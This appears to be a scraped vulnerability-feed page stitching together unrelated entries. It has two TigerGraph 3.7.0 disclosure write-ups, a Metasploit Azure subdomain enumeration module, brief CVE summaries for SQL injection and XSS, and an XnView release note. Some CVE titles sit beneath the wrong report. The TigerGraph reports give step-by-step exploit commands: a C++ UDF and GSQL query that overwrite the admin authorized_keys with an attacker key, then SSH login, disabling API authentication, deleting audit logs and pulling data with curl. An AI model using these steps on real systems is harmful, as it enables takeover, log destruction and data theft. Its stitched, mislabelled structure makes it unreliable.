An issue was discovered in Tigergraph Enterprise 3.7.0. There is unsecured write access to SSH authorized keys file. Any code running as the tigergraph user is able to add their SSH public key into the authorised keys file. This allows an attacker to obtain password-less SSH key access by using their own SSH key.

In systems that allow users to login via SSH, the authorized\_keys file acts as a user configurable access control list. It specifies a list of cryptographic keys that the user can provide to the system to allow them to login. Often this is used for users to authenticate themselves without entering a password.

In this report we demonstrate that the TigerGraph platform does not adequately protect the authorized\_keys file of its administrative user, thereby, allowing an attacker to both read and write to it. The consequences are that an attacker is able to install additional keys into the authorized\_keys file which grants them password-less access to a remote TigerGraph installation and its host operating system where they have full control of the application and its data.

**Impact**

Severe.

The TigerGraph platform runs all system services using a single administrative user — tigergraph — who has the ability to remotely login to other remote nodes within the TigerGraph cluster using the SSH protocol. The installation guide details this as a precondition for installing TigerGraph in a clustered configuration (see Post Installation Checks) and the set of administrative commands that are available to the tigergraph user due to this configuration can be found in the (legacy) documentation (see Advanced Platform Operations).

Therefore, this vulnerability can be used to create a backdoor into a TigerGraph system that allows attackers a convenient method of ingress into a remote TigerGraph deployment with full administrative control. Once an attacker has access to an administrative shell then they have full control over the entire TigerGraph cluster and its underlying servers.

This increases the severity of CVE-2022-30331 as it highlights another route in which an attacker is able to obtain administrator level privileges by bypassing TigerGraph’s access controls.

**Products/Versions Affected**

*   TigerGraph Enterprise Free Edition 3.7.0 Docker Image
*   TigerGraph Enterprise Free Edition 3.7.0

We suspect that this vulnerability may be present in all TigerGraph products (although this is not confirmed).

**Steps to Reproduce****Download and Run TigerGraph**

Using docker download at the latest TigerGraph image and start the server:

**1.) Optional: clean-up old TigerGraph docker images and obtain the latest version:**

docker rm tigergraph
docker pull tigergraph/tigergraph:latest
latest: Pulling from tigergraph/tigergraph
Digest: sha256:6c00ec6646f66a14fd0c7babdbf19bf9e70c5548aebc04ac8958015d5f62af31
Status: Image is up to date for tigergraph/tigergraph:latest
docker.io/tigergraph/tigergraph:latest

**2.) Download and run the docker image (note: we do not need to attach a volume):**

docker run -d \\
	-p 14022:22 \\
	-p 9000:9000 \\
	-p 14240:14240 \\
	--name tigergraph \\
	--ulimit nofile=1000000:1000000 \\
	-t tigergraph/tigergraph:latest

**3.) Once the container has started, connect to it via ssh (note: the default password is ‘tigergraph’):**

ssh -p 14022 tigergraph@localhost

**4.) Start all TigerGraph services:**

gadmin start all

**5.) Using GSQL, create a new graph called test and add a node to it:**

$ gsql
GSQL> CREATE VERTEX Node(PRIMARY\_ID id UINT, value STRING) WITH primary\_id\_as\_attribute="true"
GSQL> CREATE GRAPH test(\*)
GSQL> begin
GSQL> CREATE QUERY ins(UINT id, STRING value) FOR GRAPH test {
GSQL>   INSERT INTO Node VALUES(id, value);
GSQL> }
GSQL> end
GSQL> interpret query ins(1,"hello")

**6.) Create a user — alice — with minimal privileges using GSQL:**

gsql "create user"
User Name : alice
New Password : \*\*\*\*\*
Re-enter Password : \*\*\*\*\*

**7.) Grant privileges to Alice:**

gsql "grant role designer on graph test to alice"

**8.) Enable RESTPP authentication**

gadmin config set RESTPP.Factory.EnableAuth true
gadmin config apply -y
gadmin restart restpp nginx gui gsql -y

**Prepare A New SSH Key**

**On your local machine create a new SSH key. We use the following command to create a new key in the file bad-key with its corresponding public key in the file bad-key.pub:**

ssh-keygen -f bad-key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in bad-key
Your public key has been saved in bad-key.pub
The key fingerprint is:
SHA256:6H9Tqv60XkhU+6f82b18HvZvX6ZQaTGC1yUFIVCw5sU 
The key's randomart image is:
+---\[RSA 3072\]----+
|          o++ ++o|
|           = + o |
|          = E +  |
|       . + o o + |
|      . S o   = .|
|     .   . ..+ o |
|      .   ooo ooo|
|       . .+o .o+X|
|       .+=+.  .\*&|
+----\[SHA256\]-----+

Note: we just left the password empty to enable us to use password-less SSH connections.

**Download GSQL Client and Connect**

**We will run our GSQL commands as our newly created user alice. To do this we will need to get a copy of the GSQL client that we can run locally. The easiest way to do this is to copy it from the docker image like so:**

docker cp tigergraph:/home/tigergraph/tigergraph/app/3.7.0/dev/gdk/gsql/lib/gsql\_client.jar  gsql\_client.jar

**Once downloaded a GSQL console can be opened for alice by running the following command:**

java -jar gsql\_client.jar -ip localhost -u alice -g test
Adding gsql-server host localhost
Password for alice : \*\*\*\*\*
If there is any relative path, it is relative to <System.AppRoot>/dev/gdk/gsql
Welcome to TigerGraph.
GSQL >

**Obtaining authorized\_keys File From The Remote System**

To demonstrate that the authorized_keys file of the administrative user is not readily protected from unauthorized or erroneous access we download it via the AdminPortal. Although this step assumes that the login credentials of the administrative user are known, the salient point here is that there is a lack of security mechanisms to limit which parts of the filesystem different components in the TigerGraph system can access.

**Login To The AdminPortal**

The simplest way to obtain the administrative users login credentials is using AdminStudio and to do this follow these steps:

**1.) Open a web-browser and go to https://localhost:1420 where you will be able to login to GraphStudio using the tigergraph user:**

**2.) Click on the “Admin” button on the top-right corner to switch into administrative mode (called the AdminPortal).**

**Downloading SSH authorized\_keys File via AdminPortal**

Once logged into the AdminPortal follow the following steps to download the SSH authorized\_keys of the tigergraph user:

*   On the left-hand side expand the “Others” menu.
*   Click on “GSQL Output File” to open the file preview pane.
*   In the “File path” textbox enter the text “/home/tigergraph/.ssh/authorized_keys“.
*   Click “Preview” to check that the file exists – if it does the first few lines will be displayed.
*   Finally, click “Download” and the file will be downloaded to your local computer. On our system it was called m1_authorized_keys.

**Writing To SSH authorized\_keys**

To demonstrate a lack of security mechanisms in place on the server to prevent malicious or erroneous modification to the authorized\_keys, we use GSQL to swap out the existing authorized\_keys file for one that contains authorization for our newly created SSH key.

**Creating a UDF**

Our first step is to create a UDF to move an existing file to a new location. The steps for doing this are:

**1.) Get a copy of the ExprFunctions.hpp file from the running docker container. Here we download it to a file called my-udf.hpp that we will add our new UDF into**

docker cp tigergraph:/home/tigergraph/tigergraph/app/3.7.0/dev/gdk/gsql/src/QueryUdf/ExprFunctions.hpp my-udf.hpp

**2.) Edit my-udf.hpp. First add the two includes shown below to the list of existing includes near the top of the file:**

#include <iostream>
#include <cstdio>

**3.) After the to_string() function in my-udf.hpp add the following code that defines a UDF called rename_file():**

inline string rename\_file(string src, string dst) {
  if (chmod(src.c\_str(), S\_IRUSR | S\_IWUSR) != 0){
      return string("error changing file permissions");
  }

  if (rename(src.c\_str(), dst.c\_str()) != 0) {
      return string("error moving file");
  }
  return string("ok");  
}

**4.) Install the UDF on the remote system using the GSQL client like so:**

java -jar gsql\_client.jar -ip localhost
Adding gsql-server host localhost
If there is any relative path, it is relative to <System.AppRoot>/dev/gdk/gsql
Welcome to TigerGraph.
GSQL > put ExprFunctions from "./my-udf.hpp"
PUT ExprFunctions successfully.

**Writing GSQL To Swap Out The authorized\_keys File**

After the rename_file() UDF is installed, we can login to the GSQL as our non-administrative user alice and create a new query that will do two things: (1) create a new file on the remote system with a user provided string, and (2) rename the file to overwrite the existing authorized_keys file. The steps to create and install this GSQL query ready for user are:

**1.) Login to the GSQL service as user alice:**

java -jar gsql\_client.jar -ip localhost -g test -u alice
Adding gsql-server host localhost
Password for alice : \*\*\*\*\*
If there is any relative path, it is relative to <System.AppRoot>/dev/gdk/gsql
Welcome to TigerGraph.
GSQL>

**2.) Create a new GSQL query called write_file:**

GSQL > begin
GSQL > create query write\_file(string file, string staging, string value) for graph test {
GSQL > file f(staging);
GSQL > f.println(value);
GSQL > rename\_file(staging, file);
GSQL > }
GSQL > end
Successfully created queries: \[write\_file\].

**3.) Install the new query:**

GSQL > install query write\_file
Start installing queries, about 1 minute ...
write\_file query: curl -X GET 'https://127.0.0.1:9000/query/test/write\_file?file=VALUE&staging=VALUE&value=VALUE'. Add -H "Authorization: Bearer TOKEN" if authentication is enabled.
Select 'm1' as compile server, now connecting ...
Node 'm1' is prepared as compile server.

\[========================================================================================================\] 100% (1/1)
Query installation finished.

**Overwriting the authorized\_keys File**

Once the query is installed it can be used to overwrite files on the remote system. Here we choose to overwrite the authorized_keys file of the administrative user tigergraph. We know by convention that it is located at /home/tigergraph/.ssh/authorized_keys. However, before we overwrite it we need to know the value of our SSH public key to replace the old key with. Hence, the next steps locate our public SSH key and then overwrite the authorized_keys file on the server.

**1.) To obtain the value of our public key run the following command (or open bad-key.pub in an editor) and copy the value to the clipboard:**

cat bad-key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBkok5o1cWQyQItUxGoAB0qqhCNYWcjXcp6cC/c7ARJIr/l2Ae7HKF8rLRdH6lhFW9MM6Y0KeQ48za8taAJzwISN4a5iVK4YyKSWfqiloyLqtVKn6zy1D2PqAuuaJUGSrTmqdy4YRodeHFOG+Y5rBTAIjv6SkgS39K/jpkfunF/8F7QRfjpF2Kwv2WbQ1lLohCt9dTtigWeYUJVjKb4ioBM25+hq0bjwttV9L+5QZWqGUbII3NyceOZSWf4EaqP2kRPRnRk4yC241AV3hrZRBVUxRcLhQBpe/2rxNMOr8yi1tTRf9/HHKYRfxp1LP2uVi7g0z6CcOVctONwSeDZCdDIxgWfUJeW4NVDG8nHUuNnnhY1nXYpoah2IG05tZ3uhDpSEDfgHiL2gPrbkRPSXDvk6Yg11bxp21aNsZ7M823qvXhyFLSvgAGxfYM/l6bUYkJO9MTXjB4a4aRzbaMymTFBSXtwJNuZ7t8S+kOTsSNQlXM5IpkRiXT8L9vCOPyxtM=

**2.) To overwrite the authorized\_keys file we run our query with the following parameters. Note that the last parameter will be the value of your SSH public key from step 1.**

GSQL > run query write\_file("/home/tigergraph/.ssh/authorized\_keys","/home/tigergraph/test.txt","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBkok5o1cWQyQItUxGoAB0qqhCNYWcjXcp6cC/c7ARJIr/l2Ae7HKF8rLRdH6lhFW9MM6Y0KeQ48za8taAJzwISN4a5iVK4YyKSWfqiloyLqtVKn6zy1D2PqAuuaJUGSrTmqdy4YRodeHFOG+Y5rBTAIjv6SkgS39K/jpkfunF/8F7QRfjpF2Kwv2WbQ1lLohCt9dTtigWeYUJVjKb4ioBM25+hq0bjwttV9L+5QZWqGUbII3NyceOZSWf4EaqP2kRPRnRk4yC241AV3hrZRBVUxRcLhQBpe/2rxNMOr8yi1tTRf9/HHKYRfxp1LP2uVi7g0z6CcOVctONwSeDZCdDIxgWfUJeW4NVDG8nHUuNnnhY1nXYpoah2IG05tZ3uhDpSEDfgHiL2gPrbkRPSXDvk6Yg11bxp21aNsZ7M823qvXhyFLSvgAGxfYM/l6bUYkJO9MTXjB4a4aRzbaMymTFBSXtwJNuZ7t8S+kOTsSNQlXM5IpkRiXT8L9vCOPyxtM= ")
{
  "error": false,
  "message": "",
  "version": {
    "schema": 0,
    "edition": "enterprise",
    "api": "v2"
  },
  "results": \[\]
}

**Logging Into The Remote System**

Once the authorized\_keys file has been updated you can use the following command to login to the remote system as the TigerGraph administrative user without being prompted for a password:

**From the folder that stores your newly created SSH key (bad-key and bad-key.pub) use the following SSH command to login to the remote TigerGraph without requiring a password:**

**ssh -i bad-key -p 14022 tigergraph@localhost
The authenticity of host '\[localhost\]:14022 (\[::1\]:14022)' can't be established.
ED25519 key fingerprint is SHA256:YcV+9S8GKDc54TnX5UNIvOwub4D6d2aznpA1iuNLftY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/\[fingerprint\])? yes
Warning: Permanently added '\[localhost\]:14022' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.15.49-linuxkit x86\_64)

 \* Documentation:  https://help.ubuntu.com
 \* Management:     https://landscape.canonical.com
 \* Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Feb  6 14:31:49 2023 from 172.17.0.1
tigergraph@b07f6aa6ffac:~$**

****Circumventing Security Features And Exfiltrating Data**

**Now that we have shell access as the administrative user, we can now disable authentication for the REST API and wipe out a selection of the systems audit logs:**

tigergraph@092eb28b2d49:~$ gadmin config set RESTPP.Factory.EnableAuth false
\[   Info\] Configuration has been changed. Please use 'gadmin config apply' to persist the changes.
tigergraph@092eb28b2d49:~$ gadmin config apply
\[   Note\] Changes:
RESTPP.Factory.EnableAuth: true -> false
Proceed to apply? (y/N)y
\[   Info\] Successfully applied configuration change. Please restart services to make it effective immediately.
tigergraph@092eb28b2d49:~$ gadmin restart restpp nginx gui gsql -y
\[   Info\] Stopping NGINX RESTPP GSQL GUI
\[   Info\] Starting ZK ETCD DICT KAFKA ADMIN GSE NGINX GPE RESTPP KAFKASTRM-LL KAFKACONN GSQL GUI
tigergraph@092eb28b2d49:~$ rm gsql/\* restpp/\* controller/\*

**To prove that authentication is disabled we now exfiltrate some sensitive data from the graph test without needing to authenticate:**

curl -X GET "https://localhost:14240/restpp/graph/test/vertices/Node"
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":\[{"v\_id":"1","v\_type":"Node","attributes":{"id":1,"value":"hello"}}\]}%

**

CVE-2023-28481: Unsecured authorized_keys File

An issue was discovered in Tigergraph Enterprise 3.7.0. The TigerGraph platform allows users to define new User Defined Functions (UDFs) from C/C++ code. To support this functionality TigerGraph allows users to upload custom C/C++ code which is then compiled and installed into the platform. An attacker who has filesystem access on a remote TigerGraph system can alter the behavior of the database against the will of the database administrator; thus effectively bypassing the built in RBAC controls.

The TigerGraph platform allows users to define new User Defined Functions (UDFs) from C/C++ code. To support this functionality TigerGraph allows users to upload custom C/C++ code which is then compiled and installed into the platform (see Query User-Defined Functions :: GSQL Language Reference).

In this report we demonstrate that an attacker who has filesystem access on a remote TigerGraph system can alter the behavior of the database against the will of the database administrator; thus effectively bypassing the built in RBAC controls. To demonstrate this we show how to install a malicious UDF by modifying various source files located on the remote system.

The only mitigation of CVE-2022-30331 is that UDFs can only be installed by users authorized to do so by the TigerGraph RBAC system via the GSQL PUT command. This report demonstrates that this is not the case and that the RBAC controls in TigerGraph are easily bypassed. What raises the severity of this CVE and CVE-2022-30331 is that there are a minimum of eight active CVEs that provide an attacker with a sufficient level of privilege to exploit this vulnerability.

**Impact**

Severe.

**Products/Versions Affected**

*   TigerGraph Enterprise Free Edition 3.7.0 Docker Image
*   TigerGraph Enterprise Free Edition 3.7.0

We suspect that this vulnerability may be present in all TigerGraph products (although this is not confirmed).

**Standup A TigerGraph System**

To follow later steps a running TigerGraph system is needed. Follow these steps to create one using Docker.

Using docker download at the latest TigerGraph image and start the server:

**1.) Optional: clean-up old TigerGraph docker images and obtain the latest version:**

docker rm tigergraph
docker pull docker.tigergraph.com/tigergraph:latest

**2.) Download and run the docker image (note: we do not need to attach a volume):**

docker run -d \\
  -p 14022:22 \\
  -p 9000:9000 \\
  -p 14240:14240 \\
  --name tigergraph \\
  --ulimit nofile=1000000:1000000 \\
  -t tigergraph/tigergraph:latest

**3.) Once the container has started, connect to it via ssh (note: the default password is tigergraph):**

ssh -p 14022 tigergraph@localhost

**4.) Start all TigerGraph services**

gadmin start all

**5.) Enable RESTPP authentication**

gadmin config set RESTPP.Factory.EnableAuth true
gadmin config apply -y
gadmin restart restpp nginx gui gsql -y

**6.) Create a new graph**

gsql
GSQL> create graph test(\*)

**Installing A New UDF**

The first part of this report is to establish that a new UDF can be installed into an existing TigerGraph system outside of the normal procedures described in the documentation here: https://docs.tigergraph.com/gsql-ref/current/querying/func/query-user-defined-functions.

**Into A Clean System**

The first step is to show that an attacker is able to silently install a new UDF into a system that does not contain any UDFs. To do this the following steps will overwrite the default UDF source files – that are specified in the documentation – directly.

For these steps we will use a docker container running TigerGraph 3.7.0:

**1.) Connect to the docker container via ssh (note: the default password is \`tigergraph\`):**

ssh -p 14022 tigergraph@localhost

**2.) Locate the source files that contain the UDF definitions. The documentation specifies that these are located relative to the application root directory: AppRoot/dev/gdk/gsql/src/QueryUdf/. In this example, ExprFunctions.hpp was located at the path shown below and opened using the vi editor:**

vi tigergraph/app/3.7.0/dev/gdk/gsql/src/QueryUdf/ExprFunctions.hpp

**3.) Once opened, scroll to the bottom and create a new function called foo which will create a UDF of the same name (note: be careful to create the function within the correct C++ namespace or above the last curly brace):**

  template<>
  inline std::string to\_string (bool val) {
    return val ? "true" : "false";
  }

  inline std::string foo() {
    return std::string("hello from foo()");
  }
}
/\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*/

#endif /\* EXPRFUNCTIONS\_HPP\_ \*/

**4.) Next open a GSQL shell to work with our test graph and create a query called bar that will call our new UDF (foo) and print the output to the console:**

tigergraph@c9889364e861:~$ gsql -g test

GSQL > begin
GSQL > create query bar() for graph test {
GSQL >   print foo();
GSQL > }
GSQL > end
Successfully created queries: \[bar\].

**5.) Once the bar query is successfully created it needs to be installed for it to be usable. This can be done like so:**

GSQL > install query bar
Start installing queries, about 1 minute ...
bar query: curl -X GET 'https://127.0.0.1:9000/query/test/bar'. Add -H "Authorization: Bearer TOKEN" if authentication is enabled.
Select 'm1' as compile server, now connecting ...
Node 'm1' is prepared as compile server.

\[========================================================================================================\] 100% (1/1)
Query installation finished.

**6.) Finally, to verify that our UDF is accessible and works correctly we run the bar query:**

GSQL > run query bar()
{
  "error": false,
  "message": "",
  "version": {
    "schema": 0,
    "edition": "enterprise",
    "api": "v2"
  },
  "results": \[{"foo()": "hello from foo()"}\]
}

What these steps demonstrate is that with access to the application directory an attacker can silently install a new UDF into the system that bypasses TigerGraph’s RBAC security.

**Into System Containing Existing UDFs**

The next step is to show that an attacker is able to silently install a new UDF into a system alongside existing UDFs that have been installed by an authorized system administrator. To do this the following steps will overwrite the UDF source files that have been uploaded by the system administrator.

For these steps we will use the same docker container running TigerGraph 3.7.0 as we used in the previous section.

Our starting point is to simulate an authorized system administrator installing valid UDFs into the remote system via the GSQL client. This is done by the following steps:

**1.) Copy the default ExprFunctions.hpp from the running docker container into a local file called my-udf.hpp:**

docker cp tigergraph:/home/tigergraph/tigergraph/app/3.7.0/dev/gdk/gsql/src/QueryUdf/ExprFunctions.hpp my-udf.hpp

**2.) To run remote GSQL commands on the local machine, we need a copy of the GSQL client. We can simply copy the jar file from the docker container as well:**

docker cp tigergraph:/home/tigergraph/tigergraph/app/3.7.0/dev/gdk/gsql/lib/gsql\_client.jar .

**3.) Start the GSQL client and connect it to the remote machine:**

java -jar gsql\_client.jar -ip localhost

**4.) Once the GSQL client is connected, we finish the install of our UDFs on the remote system by running the following command:**

GSQL> put ExprFunctions from “my-udf.hpp”

Now that there are some UDFs installed on the remote server we can demonstrate that we can install a new UDF outside of the normal procedure with the following steps:

**5.) Connect to the docker container via ssh (note: the default password is \`tigergraph\`):**

ssh -p 14022 tigergraph@localhost

**6.) Locate the source files that contain the UDF definitions uploaded by the system administrator. In this example, ExprFunctions.hpp was located at the path shown below and opened using the vi editor:**

vi tigergraph/data/gsql/udf/ExprFunctions.hpp

**7.) Once opened, scroll to the bottom and create a new function called baz which will create a UDF of the same name (note: be careful to create the function within the correct C++ namespace or above the last curly bracket):**

  template<>
  inline std::string to\_string (bool val) {
    return val ? "true" : "false";
  }

  inline std::string foo() {
    return std::string("hello from foo()");
  }

  inline std::string baz() {
    return std::string("hello from baz()");
  }

}
/\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*/

#endif /\* EXPRFUNCTIONS\_HPP\_ \*/

**8.) Next open a GSQL shell to work with our test graph and create a query called qux that will call our new UDF (baz) and print the output to the console:**

tigergraph@c9889364e861:~$ gsql -g test

GSQL > begin
GSQL > create query qux() for graph test {
GSQL > print baz();
GSQL > }
GSQL > end
Successfully created queries: \[bar\].

**9.) Once the bar query is successfully created it needs to be installed for it to be usable. This can be done like so:**

GSQL > install query qux
Start installing queries, about 1 minute ...
bar query: curl -X GET 'https://127.0.0.1:9000/query/test/qux. Add -H "Authorization: Bearer TOKEN" if authentication is enabled.
Select 'm1' as compile server, now connecting ...
Node 'm1' is prepared as compile server.

\[========================================================================================================\] 100% (1/1)
Query installation finished.

**10.) Finally, to verify that our UDF is accessible and works correctly we run the qux query:**

GSQL > run query qux()
{
  "error": false,
  "message": "",
  "version": {
    "schema": 0,
    "edition": "enterprise",
    "api": "v2"
  },
  "results": \[{"baz()": "hello from baz()"}\]
}

What these steps demonstrate is that with access to the data directory an attacker can silently install a new UDF into the system that bypasses TigerGraph’s RBAC security.

**Wider Impact**

TigerGraph allows users to run arbitrary C++ code within the database and CVE-2022-30331 demonstrates that there are no security restrictions on what the code is permitted to do on the system. Currently, the only mitigation of CVE-2022-30331 is that the C++ code can only be installed by an authorized user (i.e. someone that is permitted to do this via the TigerGraph RBAC control system). The previous section demonstrates that this is in fact not the case and that the RBAC controls are easily bypassed if an attacker has access to the filesystem.

Previous sections have adequately proven that RBAC controls can be worked around by having access to the filesystem on the remote TigerGraph system. However, to show this we have relied on already having administrative access to the remote system (in the form of knowing the password of the tigergraph user). A point that may be incorrectly interpreted as a mitigation for this attack. However, we are currently aware of a minimum of eight active CVEs that provide an attacker with sufficient level of privilege to exploit this vulnerability.

The current list of active CVEs is:

*   CVE-2022-30331 Malicious UDFs
*   CVE-2023-22950 Data loading
*   CVE-2023-22948 Insecure SSH keys
*   CVE-2023-xxxxx Insecure authorized\_keys file
*   CVE-2023-xxxxx Data Upload Permissions
*   CVE-2023-xxxxx GSQL Can Write Arbitary files
*   CVE-2023-22949 Insecure login credentials
*   CVE-2023-22951 insecure web credentials

CVE-2023-28480: Silently Install UDF

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.91

This is a Metasploit module for enumerating public Azure services by validating legitimate subdomains through various DNS record queries. This cloud reconnaissance module rapidly identifies API services, storage accounts, key vaults, databases, and more!

    *Background:*Microsoft makes use of a number of different domains and subdomains foreach of their Azure services. From SQL databases to SharePoint drives, eachservice maps to its respective domain/subdomain, and with the propertoolset, these can be identified through DNS enumeration to yieldinformation about the target domain's infrastructure.enum_azuresubdomains.rb is a Metasploit module for enumerating public Azureservices by validating legitimate subdomains through various DNS recordqueries. This cloud reconnaissance module rapidly identifies API services,storage accounts, key vaults, databases, and more! Expedite your cloudreconnaissance phases with enum_azuresubdomains.rb.*Code:*### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::DNS::Enumeration  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Azure Subdomain Scanner and Enumerator',        'Description' => 'This module can be used for enumerating publicAzure services by locating valid subdomains through various DNS queries.',        'Author' => ['RoseSecurity <RoseSecurityConsulting[at]protonmail.me>'],        'References' => ['www.netspi.com/blog/technical/cloud-penetration-testing/enumerating-azure-services'],        'License' => MSF_LICENSE      )      )    register_options(      [        OptString.new('DOMAIN', [true, 'The target domain without TLD (Ex:victim rather than victim.org)']),        OptBool.new('PERMUTATIONS',                    [false,                     'Prepend and append permutated keywords to domain',false]),        OptBool.new('ENUM_A', [true, 'Enumerate DNS A record', true]),        OptBool.new('ENUM_CNAME', [true, 'Enumerate DNS CNAME record',true]),        OptBool.new('ENUM_MX', [true, 'Enumerate DNS MX record', true]),        OptBool.new('ENUM_NS', [true, 'Enumerate DNS NS record', true]),        OptBool.new('ENUM_SOA', [true, 'Enumerate DNS SOA record', true]),        OptBool.new('ENUM_TXT', [true, 'Enumerate DNS TXT record', true])      ]    )  end  def dns_enum(target_domains)    target_domains.each do |domain|      next unless dns_get_a(domain)      print_good("Discovered Target Domain: #{domain} \n")      dns_get_a(domain) if datastore['ENUM_A']      dns_get_cname(domain) if datastore['ENUM_CNAME']      dns_get_ns(domain) if datastore['ENUM_NS']      dns_get_mx(domain) if datastore['ENUM_MX']      dns_get_soa(domain) if datastore['ENUM_SOA']      dns_get_txt(domain) if datastore['ENUM_TXT']    end  end  def run    # Array of subdomains to enumerate    domain = datastore['DOMAIN']    subdomains = [      '.onmicrosoft.com',      '.scm.azurewebsites.net',      '.azurewebsites.net',      '.p.azurewebsites.net',      '.cloudapp.net',      '.file.core.windows.net',      '.blob.core.windows.net',      '.queue.core.windows.net',      '.table.core.windows.net',      '.mail.protection.outlook.com',      '.sharepoint.com',      '.redis.cache.windows.net',      '.documents.azure.com',      '.database.windows.net',      '.vault.azure.net',      '.azureedge.net',      '.search.windows.net',      '.azure-api.net',      '.azurecr.io'    ]    # Array of keywords to prepend and append    permutations = %w[      root      web      api      azure      azure-logs      data      database      data-private      data-public      dev      development      demo      files      filestorage      internal      keys      logs      private      prod      production      public      service      services      splunk      sql      staging      storage      storageaccount      test      useast      useast2      centralus      northcentralus      westcentralus      westus      westus2    ]    # Create permutated array of keywords and target domain    if datastore['PERMUTATIONS']      permutated_domains = []      permutations.each do |keywords|        permutated_domains.append("#{domain}-#{keywords}")        permutated_domains.append("#{keywords}-#{domain}")      end      # Permutated and Normal list of subdomains      target_domains = []      subdomains.each do |tld|        target_domains.append(domain + tld)        permutated_domains.each do |_subdomain|          target_domains.append(domain + tld)        end      end      # Query DNS records of permutated and normal target subdomains    else      # Query DNS records of normal target subdomains      target_domains = []      subdomains.each do |tld|        target_domains.append(domain + tld)      end    end    dns_enum(target_domains)  endend

Microsoft Azure Subdomain Scanner / Enumerator

novel-plus v3.6.2 was discovered to contain a SQL injection vulnerability.

**novel（学习版）**

novel 是一套基于时下最新 Java 技术栈 Spring Boot 3 + Vue 3 开发的前后端分离学习型小说项目，配备保姆级教程手把手教你从零开始开发上线一套生产级别的 Java 系统，由小说门户系统、作家后台管理系统、平台后台管理系统等多个子系统构成。

**novel-cloud（微服务版）**

novel-cloud 是基于 novel 构建的 Spring Cloud 微服务技术栈学习型小说项目。选用了 Spring Boot 3 、Spring Cloud 2022、Spring Cloud Alibaba 2022、MyBatis-Plus、ShardingSphere-JDBC、Redis、RabbitMQ、Elasticsearch 等流行技术，集成了 Nacos 注册/配置中心、Spring Cloud Gateway 网关、Spring Boot Admin 监控中心、XXL-JOB 分布式调度中心等基础服务。

**novel-plus（应用版）**

novel-plus 是一个多端（PC、WAP）阅读，功能完善的小说 CMS 系统。由前台门户系统、作家后台管理系统、平台后台管理系统和爬虫管理系统等多个子系统构成，包括小说推荐、作品检索、小说排行、小说阅读、小说评论、会员中心、作家专区等功能，支持自定义多模版、可拓展的多种小说内容存储方式（内置数据库分表存储和 TXT 文本存储）、阅读主题切换、多爬虫源自动采集和更新小说数据、会员充值、订阅模式、新闻发布和实时统计报表。

**novel-download**

novel-download 是基于 novel-plus 改造的小说搜索 & TXT 下载网站，低配置服务器建站的福音，适合个人使用。包括只保存小说关键信息不保存章节内容以减少磁盘占用和提高爬虫采集效率、多爬虫源配置以提高小说资源的有效性、与 novel-plus 版本及安装使用方法保持完全一致以减少学习成本等功能特色。

CVE-2023-37847: 小说精品屋-GitHub开源小说系统

SQL Injection vulnerability in file `Base_module_model.php` in Daylight Studio FUEL-CMS version 1.4.9, allows remote attackers to execute arbitrary code via the `col` parameter to function `list_items`.

**Daylight Studio FUEL-CMS SQLi Vulnerability**

Moderate severity GitHub Reviewed Published Aug 11, 2023 to the GitHub Advisory Database • Updated Aug 11, 2023

GHSA-7rvp-xqj7-rxf2: Daylight Studio FUEL-CMS SQLi Vulnerability

SQL Injection vulnerability in oretnom23 School Faculty Scheduling System version 1.0, allows remote attacker to execute arbitrary code, escalate privilieges, and gain sensitive information via crafted payload to id parameter in manage_user.php.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2020-36034: GitHub - TCSWT/School-Faculty-Scheduling-System

Cross Site Scripting (XSS) vulnerability in Name Input Field in Contact Us form in Laborator Kalium before 3.0.4, allows remote attackers to execute arbitrary code.

CVE-2020-24075: Kalium Changelog - Laborator

Buffer Overflow vulnerability in XNView version 2.49.3, allows local attackers to execute arbitrary code via crafted TIFF file.

Dear user,

XnView 2.49.4 for Windows is available. Versions are available on the normal XnView Download page.

Please note that the XnView Download page offers packages with German/French Setup and German/French Online help.

Direct links to the English Standard version are:  
http://download.xnview.com/XnView-win.exe (English Setup, Multi language)  
http://download.xnview.com/XnView-win.zip (ZIP file, Multi language)

XnView Shell Extension 32bits:  
http://download.xnview.com/XnShellEx.exe  
http://download.xnview.com/XnShellEx.zip

XnView Shell Extension 64bits:  
http://download.xnview.com/XnShellEx64.exe  
http://download.xnview.com/XnShellEx64.zip

SHA256:  
XnView-win.exe: 030E3E45C51A349A3417B52AD6F6547267F1AA6E86BF03BB13E49341AB9FAEB8  
XnView-win.zip: 9E936FB7CD699019A2D1ADF795D6BB078A08686D95ACA0BEA482E0ECE5C72902  
XnView-win-full.exe: 31E13FE27894610D27167ABB0503C6B109E00169D6F3E291BE6661D27953E1C6  
XnView-win-full.zip: 646DE249CEB6E9C1736BC34217C36E720FD7E2FA25468B271A6DEC18707D4E3E  
XnView-win-small.exe: 57E5DF33083C3F440CFA7E44ABE4403724679EEC7A1E57018A5B81A1748557FB  
XnView-win-small.zip: 15DC199567011B41B616BB38DFF31771A9D3E65F1517FC2BEE2068DD69B479FE

\_\_\_\_ 2.49.4 Changelog

\* Ghostscript 9.53.x  
\* GPS & file date - viewtopic.php?f=56&t=40971  
\* TIFF Security vulnerability (Thanks to Michael Heinzl)  
\* NConvert: -levels2 - viewtopic.php?f=57&t=40490  
\* NConvert: -resize supports cm/mm/inches  
\* NConvert: -autodeskew fixed  
\* NConvert: -noholder to disable %$ chars - viewtopic.php?f=57&t=40820

